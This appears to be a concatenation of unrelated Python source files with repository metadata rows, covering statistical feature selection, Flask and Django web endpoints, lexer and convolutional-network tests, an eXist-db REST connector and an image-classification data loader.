'''
correlation = []
p_values = []
results = []
if num_columns:
num_columns = num_columns
else:
num_columns = df.select_dtypes(include=['int','float', 'int32', 'float64']).columns.tolist()
for col in num_columns:
df[col] = df[col].fillna(df[col].median())
correlation_aux, p_value_aux = pointbiserialr(df[col], df[y])
correlation.append(correlation_aux)
p_values.append(p_value_aux)
if p_value_aux <= significance:
results.append('Reject H0')
else:
results.append('Accept H0')
pb_df = pd.DataFrame({'column':num_columns, 'correlation':correlation, 'p_value':p_values, 'result':results})
columns_remove_pb = pb_df.loc[pb_df['result']=='Accept H0']['column'].values.tolist()
return pb_df, columns_remove_pb
class Boruta:
"""
    A class to perform feature selection, based on the BorutaPy class of the boruta package.
    This version is based only on the feature importance of a random forest model and returns results in a more readable form.
See https://github.com/scikit-learn-contrib/boruta_py for more details (original implementation)
...
Attributes
----------
n_iter : int
number of iterations the algorithm will perform
columns_removed : list
list of columns to be removed (Obtained after fit method runs)
Methods
-------
fit(X, y):
        Runs the Boruta algorithm. It produces a list of columns we should remove and a boolean vector.
"""
def __init__(self, n_iter=100):
"""
Constructs all the necessary attributes for the boruta object.
Parameters
----------
n_iter : int
number of iterations the algorithm will perform
"""
self.n_iter = n_iter
self._columns_remove_boruta = None
self._bool_decision = None
self._best_features = None
def fit(self, X, y, cat_columns=True, num_columns=True):
"""
Runs Boruta Algorithm.
Parameters
----------
X : pandas.dataframe
Pandas Data Frame with all features
y: pandas.dataframe
Pandas Data Frame with target
Returns
-------
None
"""
X.replace(to_replace=[None], value=np.nan, inplace=True)
if (num_columns == False) & (cat_columns == True):
cat_columns = X.select_dtypes(include=['object']).columns.tolist()
X.loc[:, cat_columns] = X.loc[:, cat_columns].astype('str')
cat_pipe_preprocessor = Pipeline(steps = [('imputer', SimpleImputer(strategy = 'most_frequent')), ('cat_transformer', OrdinalEncoder())])
preprocessor = ColumnTransformer(transformers = [('cat_pipe_preprocessor', cat_pipe_preprocessor, cat_columns)])
X_processed = preprocessor.fit_transform(X)
rf = RandomForestClassifier(n_jobs=-1, class_weight='balanced', max_depth=5, random_state=123)
            # Creating the Boruta selector
            selector = BorutaPy(rf, n_estimators='auto',random_state=123, max_iter = self.n_iter)
            selector.fit(X_processed, y)
elif (cat_columns==False) & (num_columns==True):
num_columns = X.select_dtypes(include=['int','float']).columns.tolist()
num_pipe_preprocessor = Pipeline(steps= [('imputer',SimpleImputer(strategy = 'median'))])
preprocessor = ColumnTransformer(transformers = [('num_pipe_preprocessor',num_pipe_preprocessor, num_columns)])
X_processed = preprocessor.fit_transform(X)
rf = RandomForestClassifier(n_jobs=-1, class_weight='balanced', max_depth=5, random_state=123)
            # Creating the Boruta selector
selector = BorutaPy(rf, n_estimators='auto',random_state=123, max_iter = self.n_iter)
selector.fit(X_processed,y)
else:
cat_columns = X.select_dtypes(include=['object']).columns.tolist()
X.loc[:, cat_columns] = X.loc[:, cat_columns].astype('str')
num_columns = X.select_dtypes(include=['int','float']).columns.tolist()
num_pipe_preprocessor = Pipeline(steps= [('imputer',SimpleImputer(strategy = 'median'))])
cat_pipe_preprocessor = Pipeline(steps = [('imputer', SimpleImputer(strategy = 'most_frequent')), ('cat_transformer', OrdinalEncoder())])
preprocessor = ColumnTransformer(transformers = [('num_pipe_preprocessor',num_pipe_preprocessor, num_columns), ('cat_pipe_preprocessor', cat_pipe_preprocessor, cat_columns)])
X_processed = preprocessor.fit_transform(X)
rf = RandomForestClassifier(n_jobs=-1, class_weight='balanced', max_depth=5, random_state=123)
            # Creating the Boruta selector
selector = BorutaPy(rf, n_estimators='auto',random_state=123, max_iter = self.n_iter)
selector.fit(X_processed,y)
bool_decision = [not x for x in selector.support_.tolist()] # apenas invertendo o vetor de true/false
columns_remove_boruta = X.loc[:,bool_decision].columns.tolist()
columns_keep_boruta = X.loc[:,selector.support_.tolist()].columns.tolist()
self._columns_remove_boruta = columns_remove_boruta
self._bool_decision = bool_decision
self._best_features = columns_keep_boruta
def chi_squared(df, y, cat_columns = None, significance=0.05):
'''
Performs chi2 hypothesis test to find relationship between predictors and target in a data frame
Parameters:
df (pandas.dataframe): A data frame containing categorical features and target variable
y (string): A string that saves the name of target variable
cat_columns (list): A list with the name of categorical features. If None, function tries to infer It by itself
        significance (float): A float number indicating the significance level for the test. Default is 0.05
    Returns:
chi2_df (pandas.dataframe): A data frame with the results of the tests
columns_remove_chi2 (list): A list of columns that should be removed
logs (list): A list of columns that could not be evaluated
'''
p_values = []
logs = []
chi2_results = []
results = []
if cat_columns == None:
cat_columns = df.select_dtypes(['object']).columns.tolist()
else:
cat_columns = cat_columns
for cat in cat_columns:
cross_table = pd.crosstab(df[cat], df[y])
if not cross_table[cross_table < 5 ].count().any():
cross_table = pd.crosstab(df[cat], df[y])
chi2, p, dof, expected = chi2_contingency(cross_table.values)
chi2_results.append(chi2)
p_values.append(p)
else:
logs.append("Column {} could'nt be evaluated".format(cat))
chi2_results.append(np.nan)
p_values.append(np.nan)
for p in p_values:
if p <= significance:
results.append('Reject H0')
else:
results.append('Accept H0')
chi2_df = pd.DataFrame({"column":cat_columns, 'p-value':p_values,'chi2':chi2_results, 'results':results})
columns_remove_chi2 = chi2_df.loc[chi2_df['results']=='Accept H0']['column'].values.tolist()
return chi2_df, columns_remove_chi2, logs
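# --- Illustrative usage sketch (editor addition). The dataframe, column names and
# target below are hypothetical and only show how the three helpers are called.
if __name__ == "__main__":
    df = pd.DataFrame({
        "age": np.random.randint(18, 70, 200),
        "income": np.random.normal(50000, 10000, 200),
        "segment": np.random.choice(["a", "b", "c"], 200),
        "churn": np.random.randint(0, 2, 200),
    })
    # Numerical features vs. binary target: point-biserial correlation test
    pb_df, drop_pb = point_biserial(df, "churn", num_columns=["age", "income"])
    # Categorical features vs. target: chi-squared test of independence
    chi2_df, drop_chi2, logs = chi_squared(df, "churn", cat_columns=["segment"])
    # Boruta wrapper on the full feature matrix (categorical + numerical branch)
    boruta = Boruta(n_iter=20)
    boruta.fit(df.drop(columns=["churn"]), df["churn"].values)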
| 41.946341
| 186
| 0.636818
| 4,459
| 0.518549
| 0
| 0
| 0
| 0
| 0
| 0
| 3,122
| 0.363065
|
b814f40aa31389fa14c7b83364d7da4918d56140
| 6,293
|
py
|
Python
|
apiserver/apiserver/web/challenge.py
|
AlexParra03/Halite-III
|
1f108a0d9a07397400621e9a7ccefd7f4f13fee2
|
[
"MIT"
] | 1
|
2021-07-01T20:57:24.000Z
|
2021-07-01T20:57:24.000Z
|
apiserver/apiserver/web/challenge.py
|
the-higgs/Halite-III
|
1f108a0d9a07397400621e9a7ccefd7f4f13fee2
|
[
"MIT"
] | null | null | null |
apiserver/apiserver/web/challenge.py
|
the-higgs/Halite-III
|
1f108a0d9a07397400621e9a7ccefd7f4f13fee2
|
[
"MIT"
] | null | null | null |
"""
User challenge API endpoints - list user's challenges & issue new ones
"""
import datetime
import flask
import sqlalchemy
from .. import model, util
from . import match as match_api
from . import util as api_util
from .blueprint import web_api
def make_challenge_record(challenge, participants):
result = {
"challenge_id": challenge["id"],
"time_created": challenge["created"],
"time_finished": challenge["finished"],
"num_games": challenge["num_games"],
"issuer": challenge["issuer"],
"winner": challenge["winner"],
"finished": bool(challenge["finished"]),
"players": {},
}
for participant in participants:
result["players"][participant["user_id"]] = {
"username": participant["username"],
"profile_image_key": participant["profile_image_key"],
"points": participant["points"],
"is_issuer": participant["user_id"] == result["issuer"],
}
return result
def get_challenge_helper(challenge_id):
with model.read_conn() as conn:
query = sqlalchemy.sql.select([
model.challenges.c.id,
model.challenges.c.created,
model.challenges.c.finished,
model.challenges.c.num_games,
model.challenges.c.issuer,
model.challenges.c.winner,
]).select_from(model.challenges).where(
model.challenges.c.id == challenge_id
).reduce_columns()
challenge = conn.execute(query).first()
if not challenge:
raise util.APIError(
404,
message="Challenge {} not found.".format(challenge_id))
participants = conn.execute(
model.challenge_participants.join(
model.all_users,
model.challenge_participants.c.user_id == model.all_users.c.user_id
).select(
model.challenge_participants.c.challenge_id == challenge["id"]
)
)
return make_challenge_record(challenge, participants)
def list_challenges_helper(offset, limit, participant_clause,
where_clause, order_clause, user_id=None):
with model.read_conn() as conn:
if user_id is not None:
# See if user is part of a team, and add to participant
# clause
team = conn.execute(model.team_leader_query(user_id)).first()
if team:
participant_clause &= model.challenge_participants.c.user_id.in_([
user_id,
team["leader_id"],
])
else:
participant_clause &= model.challenge_participants.c.user_id == user_id
query = sqlalchemy.sql.select([
model.challenges.c.id,
model.challenges.c.created,
model.challenges.c.finished,
model.challenges.c.num_games,
model.challenges.c.issuer,
model.challenges.c.winner,
]).select_from(model.challenges).where(
where_clause &
sqlalchemy.sql.exists(model.challenge_participants.select(
participant_clause &
(model.challenges.c.id == model.challenge_participants.c.challenge_id)
).correlate(model.challenges))
).order_by(*order_clause).offset(offset).limit(limit).reduce_columns()
challenges = conn.execute(query)
result = []
for challenge in challenges.fetchall():
participants = conn.execute(sqlalchemy.sql.select([
model.challenge_participants.c.user_id,
model.challenge_participants.c.points,
model.users.c.username,
model.users.c.oauth_profile_image_key.label("profile_image_key"),
]).select_from(model.challenge_participants.join(
model.users,
model.challenge_participants.c.user_id == model.users.c.id
)).where(
model.challenge_participants.c.challenge_id == challenge["id"]
)).fetchall()
result.append(make_challenge_record(challenge, participants))
return result
@web_api.route("/challenge", methods=["GET"])
@util.cross_origin(methods=["GET"])
def list_challenges():
offset, limit = api_util.get_offset_limit()
where_clause, order_clause, manual_sort = api_util.get_sort_filter({
"issuer": model.challenges.c.issuer,
"created": model.challenges.c.created,
"finished": model.challenges.c.finished,
"num_games": model.challenges.c.num_games,
"winner": model.challenges.c.winner,
"status": model.challenges.c.status,
"id": model.challenges.c.id,
}, ["finished", "participant"])
participant_clause = sqlalchemy.true()
for (field, op, val) in manual_sort:
if field == "finished":
where_clause &= model.challenges.c.status == "finished"
elif field == "participant":
participant_clause &= op(model.challenge_participants.c.user_id, val)
result = list_challenges_helper(offset, limit,
participant_clause,
where_clause, order_clause)
return flask.jsonify(result)
@web_api.route("/challenge/<int:challenge_id>", methods=["GET"])
@util.cross_origin(methods=["GET"])
def get_challenge(challenge_id):
result = get_challenge_helper(challenge_id)
return flask.jsonify(result)
@web_api.route("/challenge/<int:challenge_id>/match", methods=["GET"])
@util.cross_origin(methods=["GET"])
def list_challenge_matches(challenge_id):
offset, limit = api_util.get_offset_limit()
where_clause, order_clause, manual_sort = api_util.get_sort_filter({
"game_id": model.games.c.id,
"time_played": model.games.c.time_played,
}, ["timed_out"])
participant_clause = sqlalchemy.true()
where_clause &= model.games.c.challenge_id == challenge_id
for (field, _, _) in manual_sort:
if field == "timed_out":
participant_clause &= model.game_participants.c.timed_out
result = match_api.list_matches_helper(
offset, limit, participant_clause, where_clause, order_clause)
return flask.jsonify(result)
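# --- Illustrative client sketch (editor addition, commented out). The host/port and
# any URL prefix are hypothetical: they depend on where the `web_api` blueprint is
# registered, and pagination/filter query parameters are parsed by the api_util
# helpers, whose exact format is defined elsewhere in the project.
#
# import requests
# base = "http://localhost:5000"
# challenge = requests.get(base + "/challenge/42").json()        # get_challenge
# matches = requests.get(base + "/challenge/42/match").json()    # list_challenge_matches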
| 36.587209
| 87
| 0.622755
| 0
| 0
| 0
| 0
| 2,079
| 0.330367
| 0
| 0
| 741
| 0.11775
|
b8155fb4487ab6eefaea72ef47aa753b0a19b9bd
| 264
|
py
|
Python
|
txtjokes/urls.py
|
paqman85/txtjokes
|
d5b9faa1fd3f797c2feee277b8cd428cc05a17ed
|
[
"MIT"
] | 1
|
2020-12-08T19:00:33.000Z
|
2020-12-08T19:00:33.000Z
|
txtjokes/urls.py
|
paqman85/txtjokes
|
d5b9faa1fd3f797c2feee277b8cd428cc05a17ed
|
[
"MIT"
] | 3
|
2021-03-30T13:47:03.000Z
|
2021-09-22T19:03:46.000Z
|
txtjokes/urls.py
|
paqman85/txtjokes
|
d5b9faa1fd3f797c2feee277b8cd428cc05a17ed
|
[
"MIT"
] | 1
|
2020-04-24T14:39:03.000Z
|
2020-04-24T14:39:03.000Z
|
from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('txt-jokes-administratus/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
]
| 24
| 54
| 0.704545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 65
| 0.246212
|
b8180b5b5c77d3a1a684f4f02028d017f4b7a210
| 1,909
|
py
|
Python
|
newsservice/requestnews.py
|
mohawk781/newsservice
|
0b7007c632211e35000dfba5e8ff9f23cff9450d
|
[
"Apache-2.0"
] | null | null | null |
newsservice/requestnews.py
|
mohawk781/newsservice
|
0b7007c632211e35000dfba5e8ff9f23cff9450d
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:59:17.000Z
|
2021-06-01T23:59:17.000Z
|
newsservice/requestnews.py
|
mohawk781/newsservice
|
0b7007c632211e35000dfba5e8ff9f23cff9450d
|
[
"Apache-2.0"
] | 1
|
2019-09-06T10:51:08.000Z
|
2019-09-06T10:51:08.000Z
|
import json
from newsservice.models import News
from flask import (Blueprint, request)
bp = Blueprint('request', __name__)
@bp.route('/requestnews', methods=['GET', 'POST'])
def requestdb():
"""
    This method receives filter values as JSON and uses them to query the database.
    It creates a list of all database entries that match the filters.
    Then it converts the list to a JSON document.
    :return: JSON document containing all database entries that match the filter values.
"""
data = []
articles = News.query.all()
if request.json['id'] != "":
articles = [article for article in articles if str(article.id) == request.json['id']]
if request.json['tag'] != "":
articles = [article for article in articles if article.tag == request.json['tag']]
if request.json['author'] != "":
articles = [article for article in articles if request.json['author'] in article.author]
if request.json['title'] != "":
articles = [article for article in articles if request.json['title'] in article.title]
if request.json['text'] != "":
articles = [article for article in articles if request.json['text'] in article.text]
if request.json['facilityid'] != "":
articles = [article for article in articles if request.json['facilityid'] in article.facilityid]
if request.json['older'] != "":
articles = [article for article in articles if article.time <= request.json['older']]
if request.json['newer'] != "":
articles = [article for article in articles if article.time >= request.json['newer']]
for article in articles:
data.insert(0, {'id': article.id, 'title': article.title, 'author': article.author, 'time': article.time, 'tag': article.tag,
'text': article.text, 'facilityid': article.facilityid})
return json.dumps(data)
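# --- Illustrative request sketch (editor addition, commented out). It shows the JSON
# payload the /requestnews endpoint expects: every key must be present, and an empty
# string means "do not filter on this field". Host and port are hypothetical.
#
# import requests
# payload = {
#     "id": "", "tag": "sports", "author": "", "title": "",
#     "text": "", "facilityid": "", "older": "", "newer": "",
# }
# articles = requests.post("http://localhost:5000/requestnews", json=payload).json()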
| 38.959184
| 133
| 0.655317
| 0
| 0
| 0
| 0
| 1,781
| 0.932949
| 0
| 0
| 540
| 0.282871
|
b8185170e7135ee17602f233ff3d6eb5d6bbc140
| 943
|
py
|
Python
|
tests/test_lexer.py
|
movermeyer/rexlex
|
6c451a3b7e9134cbdf895a7ec5682e480480ef1a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_lexer.py
|
movermeyer/rexlex
|
6c451a3b7e9134cbdf895a7ec5682e480480ef1a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_lexer.py
|
movermeyer/rexlex
|
6c451a3b7e9134cbdf895a7ec5682e480480ef1a
|
[
"BSD-3-Clause"
] | 1
|
2018-03-05T00:40:04.000Z
|
2018-03-05T00:40:04.000Z
|
import re
import unittest
from rexlex import Lexer
from rexlex.lexer.itemclass import get_itemclass
class TestableLexer(Lexer):
"""Test tuple state transitions including #pop."""
LOGLEVEL = None
re_skip = re.compile('\s+')
tokendefs = {
'root': [
('Root', 'a', 'bar'),
('Root', 'e'),
],
'foo': [
('Foo', 'd'),
],
'bar': [
('Bar', 'b', 'bar'),
('Bar', 'c', 'foo'),
],
}
class TupleTransTest(unittest.TestCase):
text = 'abcde'
Item = get_itemclass(text)
expected = [
Item(start=0, end=1, token='Root'),
Item(start=1, end=2, token='Bar'),
Item(start=2, end=3, token='Bar'),
Item(start=3, end=4, token='Foo'),
Item(start=4, end=5, token='Root')]
def test(self):
toks = list(TestableLexer(self.text))
self.assertEqual(toks, self.expected)
| 21.930233
| 54
| 0.510074
| 836
| 0.886532
| 0
| 0
| 0
| 0
| 0
| 0
| 162
| 0.171792
|
b8187e4887ed852a5b867debdeeccee5408895fe
| 7,134
|
py
|
Python
|
Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py
|
xapharius/HadoopML
|
c0129f298007ca89b538eb1a3800f991141ba361
|
[
"MIT"
] | 2
|
2018-02-05T12:41:31.000Z
|
2018-11-23T04:13:13.000Z
|
Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py
|
xapharius/HadoopML
|
c0129f298007ca89b538eb1a3800f991141ba361
|
[
"MIT"
] | null | null | null |
Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py
|
xapharius/HadoopML
|
c0129f298007ca89b538eb1a3800f991141ba361
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import utils.imageutils as imgutils
import utils.numpyutils as nputils
from algorithms.neuralnetwork.convolutional.conv_net import ConvNet
from datahandler.numerical.NumericalDataSet import NumericalDataSet
import utils.serialization as srlztn
def gen_vertical_bars(num):
bars = []
for _ in range(num):
x, y = np.random.randint(low=0, high=15, size=2)
length = np.random.randint(low=4, high=13)
bar = np.zeros((16, 16))
bar[y:y+length, x:x+2] = 1
bars.append(bar)
return bars
def gen_horizontal_bars(num):
bars = []
for _ in range(num):
x, y = np.random.randint(low=0, high=15, size=2)
length = np.random.randint(low=4, high=13)
bar = np.zeros((16, 16))
bar[y:y+2, x:x+length] = 1
bars.append(bar)
return bars
class Test(unittest.TestCase):
def test_bars(self):
# 16x16 images with bars that are 2 pixel thick
train_verticals = gen_vertical_bars(50)
train_horizontals = gen_horizontal_bars(50)
test_verticals = gen_vertical_bars(50)
test_horizontals = gen_horizontal_bars(50)
inputs = np.array(train_verticals + train_horizontals)
targets = np.array([[1, 0] for _ in train_verticals] + [[0, 1] for _ in train_horizontals])
data_set = NumericalDataSet(inputs, targets)
test_inputs = np.array(test_verticals + test_horizontals)
test_targets = np.array([[1, 0] for _ in test_verticals] + [[0, 1] for _ in test_horizontals])
test_data_set = NumericalDataSet(test_inputs, test_targets)
# 16x16 -> C(3): 14x14 -> P(2): 7x7 -> C(3): 5x5 -> P(5): 1x1
net_topo = [('c', 3, 6), ('p', 2), ('c', 3, 8), ('p', 5), ('mlp', 8, 8, 2)]
net = ConvNet(iterations=50, learning_rate=0.001, topo=net_topo)
net.train(data_set)
preds = net.predict(test_data_set)
conf_mat = nputils.create_confidence_matrix(preds, test_targets, 2)
print "Error rate: " + str(100 - (np.sum(conf_mat.diagonal()) / np.sum(conf_mat[:, :]) * 100)) + "%"
def test_mnist_digits(self):
digits, labels = imgutils.load_mnist_digits('../../data/mnist-digits/train-images.idx3-ubyte', '../../data/mnist-digits/train-labels.idx1-ubyte', 300)
targets = np.array([ nputils.vec_with_one(10, digit) for digit in labels ])
train_data_set = NumericalDataSet(np.array(digits)[:150], targets[:150])
test_data_set = NumericalDataSet(np.array(digits)[150:], targets[150:])
# 28x28 -> C(5): 24x24 -> P(2): 12x12 -> C(5): 8x8 -> P(2): 4x4 -> C(4): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 4, 16), ('mlp', 16, 16, 10)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo, activation_func=(nputils.rectifier, nputils.rectifier_deriv))
net.train(train_data_set)
try:
srlztn.save_object('../../trained/mnist_digits.cnn', net)
except:
print("serialization error")
preds = net.predict(test_data_set)
conf_mat = nputils.create_confidence_matrix(preds, targets[150:], 10)
print conf_mat
num_correct = np.sum(conf_mat.diagonal())
num_all = np.sum(conf_mat[:, :])
print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
def test_face_recognition(self):
faces = imgutils.load_images('/home/simon/trainingdata/faces/', max_num=100)
non_faces = imgutils.load_images('/home/simon/trainingdata/nonfaces/', max_num=100)
faces_training = faces[0:50]
faces_testing = faces[50:]
non_faces_training = non_faces[0:50]
non_faces_testing = non_faces[50:]
inputs_training = np.array(faces_training + non_faces_training)
targets_training = np.array([ [1, 0] for _ in range(len(faces_training))] + [ [0, 1] for _ in range(len(non_faces_training))])
data_set_training = NumericalDataSet(inputs_training, targets_training)
inputs_testing = np.array(faces_testing + non_faces_testing)
targets_testing = np.array([ [1, 0] for _ in range(len(faces_testing))] + [ [0, 1] for _ in range(len(non_faces_testing))])
data_set_testing = NumericalDataSet(inputs_testing, targets_testing)
# 24x24 -> C(5): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2): 4x4 -> C(3): 2x2 -> p(2): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 3, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
net.train(data_set_training)
preds = net.predict(data_set_testing)
conf_mat = nputils.create_confidence_matrix(preds, targets_testing, 2)
num_correct = np.sum(conf_mat.diagonal())
num_all = np.sum(conf_mat[:, :])
print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
# fig = plt.figure(1)
# plt.set_cmap('gray')
# num_rows = 6x-img.shape[0]
# num_cols = 4
# fig.add_subplot(num_rows, num_cols, 1)
# plt.imshow(faces[0])
# for fm_idx in range(4):
# fig.add_subplot(num_rows, num_cols, num_cols*1 + fm_idx + 1)
# plt.imshow(convolved1[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*2 + fm_idx + 1)
# plt.imshow(pooled1[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*3 + fm_idx + 1)
# plt.imshow(convolved2[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*4 + fm_idx + 1)
# plt.imshow(np.array([[pooled2[0, fm_idx]]]), vmin=0, vmax=1)
# fig.add_subplot(num_rows, num_cols, 21)
# plt.imshow(np.array([[mlp_out[2][0, 0]]]), vmin=0, vmax=1)
# fig.add_subplot(num_rows, num_cols, 22)
# plt.imshow(np.array([[mlp_out[2][0, 1]]]), vmin=0, vmax=1)
#
# plt.show()
def test_smoke(self):
smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/smoke/', max_num=100)
non_smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/non-smoke/', max_num=100)
inputs_training = np.array(smoke_imgs_training + non_smoke_imgs_training)
targets_training = np.array([ [1, 0] for _ in range(len(smoke_imgs_training))] + [ [0, 1] for _ in range(len(non_smoke_imgs_training))])
data_set_training = NumericalDataSet(inputs_training, targets_training)
# 100x100 -> C(5): 96x96 -> P(2): 48x48 -> C(5): 44x44 -> P(2): 22x22 -> C(3): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2) 4x4 -> C(3): 2x2 -> P(2): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
net.train(data_set_training)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
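# --- Editor note: the shape comments above follow the usual conv/pool size arithmetic.
# For a valid convolution with kernel k: out = in - k + 1 (e.g. 16 - 3 + 1 = 14).
# For non-overlapping pooling with window p: out = in / p (e.g. 14 / 2 = 7).
# Applied to the MNIST topology: 28 -C(5)-> 24 -P(2)-> 12 -C(5)-> 8 -P(2)-> 4 -C(4)-> 1.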
| 49.2
| 158
| 0.610457
| 6,182
| 0.866555
| 0
| 0
| 0
| 0
| 0
| 0
| 1,773
| 0.248528
|
b819490a0e749fdb6fa33717dab9405f34226e11
| 2,747
|
py
|
Python
|
docker/eXist-seed/app/connector.py
|
ThomasTos/Pogues-Back-Office
|
b346d94407bf36e37d705b1d220ab0775a120574
|
[
"MIT"
] | null | null | null |
docker/eXist-seed/app/connector.py
|
ThomasTos/Pogues-Back-Office
|
b346d94407bf36e37d705b1d220ab0775a120574
|
[
"MIT"
] | 23
|
2017-08-25T16:48:57.000Z
|
2022-02-16T00:55:42.000Z
|
docker/eXist-seed/app/connector.py
|
ThomasTos/Pogues-Back-Office
|
b346d94407bf36e37d705b1d220ab0775a120574
|
[
"MIT"
] | 13
|
2017-07-03T09:15:36.000Z
|
2021-07-02T07:43:10.000Z
|
import requests
from requests.auth import HTTPBasicAuth
import sys
import os
from string import rfind
import base64
class XdbException(Exception):
'''Exist db connector exception'''
class Connector:
def __init__(self, url, user, password):
self.url = url
self.auth = HTTPBasicAuth(user, password)
'''
Create collection
'''
def create(self, root, collection):
print "creating collection %s in %s ..." % (collection, root)
params = {
'_query': 'xmldb:create-collection("%s","%s")'% (root, collection)
}
response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
if 200 != response.status_code:
raise XdbException
return '%s/%s'%(root, collection)
'''
chmod resource
    Apply the given permissions to an eXist-db resource.
'''
def chmod(self, resource, permissions):
print "setting permissions %s on %s "% (permissions, resource)
params = {
'_query': 'sm:chmod(xs:anyURI("%s"), "%s")'% (resource, permissions)
}
response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
if 200 != response.status_code:
raise XdbException
'''
Put document to collection
Collection will be created if it does not exist
'''
def upload(self, fsPath, collection):
print "storing from fs path %s to collection /%s ..." % (fsPath, collection)
_, doc = os.path.split(fsPath)
__, extension = os.path.splitext(doc)
print 'extension, doc', extension, doc
f = open(fsPath, 'r')
xqm= f.read()
f.close()
content_types = {
'.xqm': 'application/xquery',
'.xq': 'application/xquery',
'.xpl': 'application/xml',
'.xquery': 'application/xquery',
'.xml': 'application/xml',
'.xconf': 'application/xml',
'.xhtml': 'application/xml',
'.xsl': 'application/xml'
}
headers = {
'Content-Type': content_types[extension]
}
        response = requests.put('%s/exist/rest/%s/%s' % (self.url, collection, doc), auth=self.auth, headers=headers, data=xqm)
if 201 != response.status_code:
print str(response)
raise XdbException
return '%s/%s' % (collection, doc)
'''
Execute a stored Xquery remotely
'''
def execute(self, document):
headers = {
'Content-Type': 'application/xquery'
}
response = requests.get('%s/exist/rest/%s'% (self.url, document), auth=self.auth, headers=headers)
if 200 != response.status_code:
raise XdbException
return response
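# --- Illustrative usage sketch (editor addition, commented out). The URL, credentials
# and file paths below are hypothetical.
#
# conn = Connector("http://localhost:8080", "admin", "secret")
# collection = conn.create("/db/apps", "pogues")                  # -> "/db/apps/pogues"
# conn.chmod(collection, "rwxr-xr-x")                             # set permissions
# stored = conn.upload("app/modules/main.xqm", "db/apps/pogues")  # store an XQuery module
# conn.execute(stored)                                            # run it via the REST API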
| 32.702381
| 127
| 0.581361
| 2,628
| 0.95668
| 0
| 0
| 0
| 0
| 0
| 0
| 844
| 0.307244
|
b81a09ef1cba709f702bd49fe66d6f2697a395a3
| 5,736
|
py
|
Python
|
handy/2011722086_Assign3/main_app.py
|
HDNua/kwin
|
33ce866c2b37faa1a5940354a0e5b3919e5eecc8
|
[
"MIT"
] | 2
|
2017-11-01T12:46:06.000Z
|
2017-12-02T04:01:25.000Z
|
handy/2011722086_Assign3/main_app.py
|
HDNua/kwin
|
33ce866c2b37faa1a5940354a0e5b3919e5eecc8
|
[
"MIT"
] | null | null | null |
handy/2011722086_Assign3/main_app.py
|
HDNua/kwin
|
33ce866c2b37faa1a5940354a0e5b3919e5eecc8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue May 30 16:43:10 2017
☜☜☜☜☜☜★☆★☆★☆★☆ provided code ★☆★☆★☆★☆☞☞☞☞☞☞
@author: Minsooyeo
"""
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from PIL import Image as im
import numpy as np
import utills as ut
import tensorflow as tf
sess = tf.InteractiveSession()
train_epoch = 5000
#
FLAG_FINGER = 0
FLAG_FACE = 1
FLAG_ANGLE = 2
flag = FLAG_ANGLE
#
if flag is FLAG_FINGER:
class_num = 5
additional_path = '\\finger\\'
elif flag is FLAG_FACE:
class_num = 6
additional_path = '\\face\\'
elif flag is FLAG_ANGLE:
class_num = 4
additional_path = '\\angle\\'
else:
raise Exception("Unknown flag %d" %flag)
# define parameter
data_length = []
dir_image = []
data = []
label = []
data_shape = [298, 298]
current_pwd = os.getcwd()
for i in range(class_num):
dir_image.append(ut.search(current_pwd + additional_path + str(i + 1)))
data_length.append(len(dir_image[i]))
data.append(np.zeros([data_length[i], data_shape[1], data_shape[0]]))
label.append(np.zeros([data_length[i], class_num]))
label[i][:, i] = 1
# load data
for q in range(class_num):
for i in range(data_length[q]):
if i % 100 == 0:
print("%dth data is opening" %i)
data[q][i, :, :] = np.mean(im.open(current_pwd + additional_path + str(q + 1) + '\\' + dir_image[q][i]), -1)
if flag is FLAG_FINGER:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4]), axis=0)
elif flag is FLAG_FACE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4], data[5]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4], label[5]), axis=0)
elif flag is FLAG_ANGLE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3]), axis=0)
else:
raise Exception("Unknown class number %d" %class_num)
del data
del label
total_data_poin = rawdata.shape[0]
permutation = np.random.permutation(total_data_poin)
rawdata = rawdata[permutation, :, :]
raw_label = raw_label[permutation, :]
